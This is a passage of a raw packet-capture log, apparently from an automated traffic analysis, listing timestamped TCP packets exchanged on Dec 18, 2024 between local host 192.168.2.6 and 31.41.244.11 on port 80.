                                                                                                                                                              Dec 18, 2024 11:47:46.619354963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.619391918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.620457888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.620510101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.620544910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.620579958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.621521950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.621565104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.621716022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.621753931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.622733116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.622777939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.622811079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.622845888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.623855114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.623897076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.623977900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.624015093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.625073910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.625114918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.625138044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.625171900 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.755552053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.755618095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.755669117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.755696058 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.756114960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.756155014 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.756251097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.756288052 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.757313013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.757353067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.757394075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.757428885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.758444071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.758486032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.758816957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.758861065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.758929014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.758969069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.760051966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.760096073 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.760171890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.760205984 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.761140108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.761184931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.761230946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.761267900 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.762336969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.762382984 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.762944937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.762983084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.763489008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.763530016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.763601065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.763637066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.764652014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.764745951 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.764754057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.764789104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.765836000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.765876055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.765911102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.765945911 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.766988039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.767030954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.767061949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.767098904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.768171072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.768213034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.768270969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.768306971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.769325972 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.769368887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.769418955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.769458055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.770519018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.770560980 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.770600080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.770633936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.771672964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.771717072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.771765947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.771800995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.772835016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.772878885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.772948980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.772985935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.774003983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.774108887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.774156094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.775188923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.775218010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.775271893 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.776433945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.776488066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.776766062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.777509928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.777556896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.777671099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.778346062 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.778732061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.778805017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.778845072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.779985905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.780080080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.780121088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.781079054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.781352997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.781395912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.782217979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.782263041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.782299995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.783432961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.783485889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.783557892 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.784593105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.784648895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.784668922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.784704924 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.785762072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.785940886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.785984993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.786932945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.787125111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.787166119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.788057089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.788099051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.788136005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.789243937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.789307117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.789344072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.790343046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.791512966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.791527033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.791565895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.791582108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.791639090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.791676044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.792754889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.792799950 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.792845011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.793929100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.793965101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.793968916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.793998957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.795068979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.795216084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.795260906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.796283007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.796346903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.796386003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.797421932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.797465086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.797506094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.798341990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.798959017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.798974037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.798999071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.799015999 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.799761057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.799817085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.799838066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.800942898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.800995111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.801026106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.802083015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.802123070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.802129984 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.802160025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.803234100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.803391933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.803437948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.804450989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.804563046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.804611921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.805598974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.805721045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.805771112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.806804895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.806943893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.806986094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.807935953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.807982922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.808070898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.809144974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.809189081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.809262991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.810261965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.810309887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.810373068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.811467886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.811521053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.811563015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.811600924 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.812570095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.812690020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.812738895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.813818932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.813909054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.813955069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.814975023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.815171957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.815217018 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.816098928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.816178083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.816226006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.946599960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.946666002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.946748018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.946796894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.947124958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.947170973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.947391987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.947432041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.947593927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.947638035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.948596001 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.948645115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.948676109 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.948718071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.949765921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.949807882 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.950051069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.950093985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.950932026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.951040983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.951070070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.951113939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.952074051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.952117920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.952167034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.952210903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.953231096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.953277111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.953438044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.953478098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.954406977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.954447985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.954510927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.954550028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.955575943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.955620050 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.955624104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.955662012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.956770897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.956814051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.956856012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.956895113 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.957906008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.957954884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.957981110 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.958018064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.959081888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.959126949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.959127903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.959167004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.960325003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.960366011 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.960396051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.960443974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.961446047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.961514950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.961561918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.962621927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.962712049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.962766886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.963804960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.963860035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.963885069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.964953899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.965004921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.965058088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.966108084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.966157913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.966212034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.966254950 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.967319965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.967370033 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.967541933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.967586040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.968442917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.968486071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.968544960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.968586922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.969593048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.969638109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.969696999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.969738007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.970825911 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.970936060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.970938921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.970973969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.971971035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.972013950 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.972138882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.972177982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.973112106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.973159075 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.973206043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.973248005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.974417925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.974459887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.974489927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.974533081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.975470066 CET804987831.41.244.11192.168.2.6
